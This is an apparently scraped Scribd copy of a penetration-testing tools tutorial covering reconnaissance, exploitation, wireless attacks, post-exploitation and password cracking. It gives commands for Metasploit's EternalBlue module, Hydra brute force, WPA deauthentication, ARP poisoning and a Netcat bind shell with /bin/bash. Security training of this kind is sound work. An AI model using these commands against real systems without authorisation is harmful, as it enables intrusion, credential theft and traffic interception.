Scribd
Upload
32 views19 pages

Comprehensive Ethical Hacking Tools Guide

This document provides a comprehensive guide on ethical hacking tools organized into phases, including reconnaissance, scanning, vulnerability scanning, traffic analysis, wireless attacks, and post-exploitation. Each tool is detailed with its purpose, installation instructions, basic and advanced usage. It serves as a reference for ethical hackers to efficiently conduct security assessments and penetration testing.

Uploaded by

blade gaming
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
32 views19 pages

Comprehensive Ethical Hacking Tools Guide

This document provides a comprehensive guide on ethical hacking tools organized into phases, including reconnaissance, scanning, vulnerability scanning, traffic analysis, wireless attacks, and post-exploitation. Each tool is detailed with its purpose, installation instructions, basic and advanced usage. It serves as a reference for ethical hackers to efficiently conduct security assessments and penetration testing.

Uploaded by

blade gaming
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

E.

H full explained :-
Below is a from-scratch, end-to-end guide covering every tool we’ve discussed, organized into
logical phases of an ethical-hacking engagement. Each tool is broken down into:
. What it is
. When & why to use it
. Installation
. Core workflow / basic usage
. Advanced tips & common flags
Use this as your living reference—bookmark or save it for future projects.

Phase 1: Reconnaissance & Information Gathering


1. Nmap
● What: TCP/UDP port scanner, OS & service fingerprinting.
● Why: To discover live hosts, open ports, running services, and OS versions.
● Install
bash
Copy code

sudo apt update && sudo apt install nmap


● Basic
bash
Copy code

# Ping-scan a subnet, then full TCP scan on host


● nmap -sn [Link]/24
● nmap -sS -sV -O [Link]

● Advanced
○ -p- scan all ports, -T4 speed up, -A for scripts+version+OS.
○ Output: -oA project-name for all formats.
2. Masscan
● What: Ultra-fast Internet-scale port scanner.
● Why: When you need to sweep huge IP ranges quickly.
5
● Install
4
bash
3
Copy code
2
1
git clone [Link]
● cd masscan && make && sudo make install

● Basic
bash
Copy code

masscan [Link]/8 -p80,443 --rate=10000


● Advanced
○ Use --banner to grab service banners.
○ Pipe live hosts to Nmap:
bash
Copy code

masscan … -oL [Link]


○ nmap -iL [Link] -sV

3. theHarvester
● What: OSINT tool for e-mail & subdomain harvesting via search engines.
● Why: Footprint target’s external digital footprint (employee emails, hosts).
● Install
bash
Copy code

sudo apt install theharvester


● Basic
bash
Copy code

theHarvester -d [Link] -b google -l 200



● Advanced
○ Combine sources: -b bing,linkedin,github,pgp
○ Export HTML: -f [Link]

Phase 2: Scanning & Enumeration


4. WhatWeb
● What: Website fingerprinting (CMS, server, plugins).
● Why: Quickly learn technology stack.
● Install
bash
Copy code

sudo apt install whatweb


● Basic
bash
Copy code

whatweb [Link]

● Advanced
○ -a 3 for aggressive mode, --verbose for detail.
○ Scan multiple: whatweb -i [Link]
5. enum4linux
● What: SMB enumeration wrapper over smbclient/rpcclient.
● Why: Enumerate Windows users, shares, policies.
● Install
bash
Copy code

sudo apt install enum4linux


● Basic
bash
Copy code

enum4linux -a [Link]

● Advanced
○ Flags: -U (users), -S (shares), -P (password policies).
○ Save: -o [Link]
6. smbclient
● What: SMB/CIFS “FTP-like” client.
● Why: List/upload/download files from Windows shares.
● Install
bash
Copy code

sudo apt install smbclient


● Basic
bash
Copy code

smbclient -L //[Link] -N
● smbclient //[Link]/share -U user%pass

● Advanced
○ At prompt: get [Link], put [Link].
○ Use -m SMB2 to force SMB2 protocol.
7. rpcclient
● What: Low-level Windows RPC interface client.
● Why: Enumerate domains, users, groups, SIDs.
● Install
bash
Copy code

sudo apt install samba-common-bin



● Basic
bash
Copy code

rpcclient -U "" [Link]


● #> enumdomusers
● #> querydominfo

● Advanced
○ lookupsids, enumdomgroups.
○ Chain in scripts for automation.
8. SNMP Tools (snmpwalk, snmp-check)
● What: SNMP enumeration via MIBs.
● Why: Discover device info: system, interfaces, ARP tables.
● Install
bash
Copy code

sudo apt install snmp snmp-mibs-downloader snmpcheck


● Basic
bash
Copy code

snmpwalk -v2c -c public [Link]


● snmp-check [Link] -c public

● Advanced
○ Target specific OID: .[Link].[Link] for interfaces.
○ Try default communities: public, private.
9. Gobuster
● What: Fast directory/file & DNS bruteforcer (Go-based).
● Why: Discover hidden paths or subdomains.
● Install
bash
Copy code
sudo apt install gobuster

● Basic
bash
Copy code

gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link]


● gobuster dns -d [Link] -w [Link]

● Advanced
○ -t 50 threads, -x php,html, -o [Link].
○ Use DNS mode to find wildcard or takeover candidates.
10. dirb
● What: Classic web content scanner.
● Why: Quick directory/file discovery with default lists.
● Install
bash
Copy code

sudo apt install dirb


● Basic
bash
Copy code

dirb [Link] /usr/share/wordlists/dirb/[Link]


● Advanced
○ -r recursive, -S silent, -o [Link].
11. Wfuzz
● What: Flexible HTTP fuzzer for parameters, headers, files.
● Why: Deep fuzzing beyond simple wordlists.
● Install
bash

Copy code

sudo apt install wfuzz


● Basic
bash
Copy code

wfuzz -c -z file,/usr/share/wordlists/dirb/[Link] --hc 404 \


● [Link]

● Advanced
○ Fuzz params: ?id=FUZZ, hide codes with --hc/--hw.
○ Multi-placeholder: FUZZ1 & FUZZ2 with -z.

Phase 3: Vulnerability Scanning & Exploitation


12. Nikto
● What: Web-server scanner for dangerous files, outdated software.
● Why: Rapid baseline check for known issues.
● Install
bash
Copy code

sudo apt install nikto


● Basic
bash
Copy code

nikto -h [Link]

● Advanced
○ -Tuning 123 filter checks, -ssl, -output [Link].
13. OWASP ZAP (again)
● What: Free, GUI/CLI web app scanner & proxy.
● Why: Automated + manual testing in one suite.
● Install
bash
Copy code

sudo snap install zaproxy --classic


● Basic
○ Proxy your browser via localhost:8080, Spider then Active Scan.
● Advanced
○ Use scripts (JavaScript, Python, Zest), CI integration via Docker.
14. Greenbone Vulnerability Manager (GVM/OpenVAS)
● What: Full-network vulnerability management with dashboards.
● Why: Scheduled, comprehensive scanning + reporting.
● Install
bash
Copy code

sudo apt install gvm


● sudo gvm-setup
● sudo gvm-start

● Basic
○ Web UI at [Link] create targets & tasks.
● Advanced
○ greenbone-feed-sync to update feeds, automate with gvm-cli.
15. Metasploit Framework
● What: Exploitation framework with modules for scanning, exploitation, post-exploit.
● Why: To launch and manage exploits and payloads.
● Install
bash
Copy code

# On Kali it’s pre-installed


● sudo apt update && sudo apt install metasploit-framework

● Basic
bash
Copy code

msfconsole
● search smb
● use exploit/windows/smb/ms17_010_eternalblue
● set RHOSTS [Link]
● set LHOST [Link]
● run

● Advanced
○ Workspaces to separate engagements, resource scripts (.rc), meterpreter post
modules.
16. sqlmap
● What: Automated SQL-injection & database takeover tool.
● Why: Rapidly detect & exploit SQLi flaws.
● Install
bash
Copy code

sudo apt install sqlmap


● Basic
bash
Copy code

sqlmap -u "[Link] --batch --dbs


● Advanced
○ Use --level/--risk, cookies -H, tamper scripts to bypass WAFs.
17. WPScan
● What: WordPress vulnerability scanner.
● Why: Enumerate plugins, themes, users, and known WP vulns.
● Install
bash

Copy code

sudo gem install wpscan


● wpscan --update

● Basic
bash
Copy code

wpscan --url [Link] --enumerate u,p,tt


● Advanced
○ Password brute (--passwords), aggressive plugin detection, API token for DB.
18. Hydra
● What: Parallelized login cracker for many protocols.
● Why: Brute-force SSH, FTP, HTTP-forms, SMB, and more.
● Install
bash
Copy code

sudo apt install hydra


● Basic
bash
Copy code

hydra -L [Link] -P [Link] ssh://[Link]


● Advanced
○ Form-based:
nginx
Copy code
hydra -L [Link] -P [Link] http-post-form \
○ "target/[Link]:uname=^USER^&pass=^PASS^:Invalid"

Phase 4: Traffic Analysis & Man-in-the-Middle


19. Wireshark
● What: GUI packet sniffer & protocol analyzer.
● Why: Deep inspection of live traffic, decode dozens of protocols.
● Install
bash
Copy code

sudo apt install wireshark


● Basic
○ Select interface, hit “Start”, apply filters like http or [Link]==80.
● Advanced
○ Color rules, custom dissectors, export flows.
20. tcpdump
● What: CLI packet sniffer.
● Why: Quick captures & filter from shell.
● Install
bash
Copy code

sudo apt install tcpdump


● Basic
bash
Copy code

sudo tcpdump -i eth0 tcp port 80 -w [Link]


● Advanced
○ BPF filters: host [Link] and port 22, read PCAP: -r [Link].
21. Ettercap
● What: LAN-scale MITM suite (ARP spoofing, DNS spoofing).
● Why: Intercept and manipulate LAN traffic.
● Install
bash
Copy code

sudo apt install ettercap-graphical


● Basic
bash
Copy code

sudo ettercap -G

– select interface, hosts → MITM → ARP poisoning.


● Advanced
○ Use filters (.ecf) to modify HTTP responses on the fly.
22. mitmproxy
● What: SSL-capable HTTP(S) intercept proxy with console & scripting.
● Why: Inspect & modify web API calls or mobile app traffic.
● Install
bash
Copy code

sudo apt install mitmproxy


● Basic
bash
Copy code

mitmproxy --mode regular --listen-port 8080



● Advanced
○ Write Python addons to automate response tampering, replay flows.

Phase 5: Wireless Attacks


23. aircrack-ng
● What: Suite for 802.11 monitoring, packet capture, and key cracking.
● Why: Audit WPA/WPA2-PSK networks.
● Install
bash
Copy code

sudo apt install aircrack-ng


● Basic
bash
Copy code

sudo airmon-ng start wlan0


● sudo airodump-ng wlan0mon
● # capture handshake, then
● aircrack-ng -w [Link] [Link]

● Advanced
○ Deauth: aireplay-ng --deauth 10 -a <BSSID> wlan0mon to force handshake.
24. Reaver
● What: WPS PIN bruteforcer.
● Why: Recover WPA/WPA2 passphrase via WPS vulnerability.
● Install
bash
Copy code

sudo apt install reaver


● Basic
bash
Copy code

sudo reaver -i wlan0mon -b <AP-BSSID> -vv


● Advanced
○ -c <channel>, -K to stop on WPS lockout detection.
25. Wifite
● What: Automated wireless auditing tool.
● Why: Simplifies attacking multiple APs in sequence.
● Install
bash
Copy code

sudo apt install wifite


● Basic
bash
Copy code

sudo wifite

● Advanced
○ Adjust timeouts, select specific BSSIDs, save handshakes automatically.
26. Kismet
● What: Wireless network detector, sniffer, IDS.
● Why: Passive discovery of networks, clients, hidden SSIDs.
● Install
bash
Copy code

sudo apt install kismet


● Basic
bash
Copy code

sudo kismet

– configure source, start logging.


● Advanced
○ Plugins for GPS mapping, aggregate alerts.

Phase 6: Post-Exploitation & Pivoting


27. Netcat (“nc”)
● What: Versatile TCP/UDP tunnel, file transfer, shell tool.
● Why: Quick backdoors, port-forwarding, banner grabbing.
● Install
bash
Copy code

sudo apt install netcat-openbsd


● Basic
bash
Copy code

# Listener bind shell


● nc -lvnp 4444 -e /bin/bash
● # Connect from attacker
● nc target 4444

● Advanced
○ UDP mode: -u, proxy chaining: mkfifo /tmp/f; nc -l 1234 0</tmp/f | /bin/sh >/tmp/f
28. sshuttle
● What: Proxy that routes TCP (and DNS) over SSH.
● Why: Access internal networks through an SSH bastion without full VPN.
● Install
bash
Copy code
sudo apt install sshuttle

● Basic
bash
Copy code

sshuttle -r user@bastion [Link]/8


● Advanced
○ --dns tunnel DNS, -D daemonize.
29. LinPEAS
● What: Local Linux privilege-escalation enumeration script.
● Why: Automate discovery of SUID binaries, misconfigs, credentials.
● Install/Use
bash
Copy code

wget [Link]
● chmod +x [Link]
● ./[Link]

● Advanced
○ Grep for “Potential” lines, redirect to file for offline review.

Phase 7: Password Cracking


30. John the Ripper
● What: Classic CPU-based password cracker.
● Why: Quick dictionary+incremental attacks on hashes.
● Install
bash
Copy code

sudo apt install john



● Basic
bash
Copy code

john --wordlist=/usr/share/wordlists/[Link] [Link]


● Advanced
○ Use --rules, incremental mode, or --format to specify hash types.
31. Hashcat
● What: GPU-accelerated cracker supporting hundreds of hash formats.
● Why: High-speed attacks on complex hashes.
● Install
bash
Copy code

sudo apt install hashcat


● Basic
bash
Copy code

hashcat -m 0 -a 0 [Link] [Link]


● Advanced
○ Attack modes: -a 1 (combinator), -a 3 (mask), -a 6/7 (hybrid).
○ Fine-tune with --status, --restore.

Phase 8: Reverse Engineering & Static Analysis


32. radare2
● What: CLI reverse-engineering framework & disassembler.
● Why: Inspect functions, patch binaries, automate analyses.
● Install
bash
Copy code
sudo apt install radare2

● Basic
bash
Copy code

r2 binary
● [0x004000]> aa # analyze
● [0x004000]> afl # list funcs
● [0x004000]> pdf @ main # decompile main

● Advanced
○ Visual mode: V, patch: s addr; wx …, scripting via .r2 files.
33. Ghidra
● What: GUI reverse-engineering suite with C-style decompiler.
● Why: Quickly get high-level pseudocode, collaborative analysis.
● Install
. Download ZIP from [Link]
. ./ghidraRun to start.
● Basic
○ New project → import binary → run auto-analysis → browse Listing & Decompiler.
● Advanced
○ Write Java/Python scripts in the Script Manager, use Signature DB to identify library
calls.
34. apktool
● What: Android APK reverse-engineering: decode/resign resources & smali.
● Why: Inspect or modify app resources, manifest, or code.
● Install
bash
Copy code

wget [Link] -O /usr/local/bin/


[Link]
● sudo tee /usr/local/bin/apktool <<<'#!/usr/bin/env bash\njava -jar /usr/local/bin/[Link]
"$@"'
● sudo chmod +x /usr/local/bin/apktool

● Basic

bash
Copy code

apktool d [Link] -o app_src


● # edit res/, smali/
● apktool b app_src -o [Link]
● jarsigner -keystore [Link] [Link] alias

● Advanced
○ apktool if [Link] for custom frameworks, use Smali editors for precise
bytecode patching.
35. Burp Suite Community Edition
● What: Web-security proxy & manual testing toolkit (Proxy, Repeater, Decoder).
● Why: Intercept/modify HTTP(S), manually probe parameter tampering.
● Install
. Download from [Link] → java -jar burpsuite_community.jar
● Basic
○ Proxy browser on [Link]:8080 → capture requests → send to Repeater for manual
fuzzing.
● Advanced
○ Use BApp Store extensions (e.g. SAML Raider), configure session-handling rules,
Intruder for small brute forces.

Putting It All Together: Sample Workflow


. Footprint the target with theHarvester & WhatWeb.
. Discover hosts & ports using masscan → Nmap.
. Enumerate services: SMB (enum4linux, smbclient, rpcclient), SNMP (snmpwalk), web
directories (Gobuster/dirb/wfuzz).
. Scan for vulns with Nikto, GVM, WPScan, sqlmap.
. Exploit via Metasploit, Hydra, or manual Burp/ZAP attacks.
. Capture traffic with Wireshark/tcpdump, perform MITM with Ettercap/mitmproxy.
. Audit wireless using aircrack-ng, Reaver, Wifite, Kismet.
. Post-exploit: get a shell (Netcat), pivot (sshuttle), enumerate for escalation (LinPEAS).
. Crack any hashes found with John or Hashcat.
. Reverse-engineer binaries with radare2, Ghidra, apktool for deeper insight.
Keep this guide at hand as your ultimate reference—each tool’s section is self-contained for
quick lookups. Happy hacking (ethically, of course)!

You might also like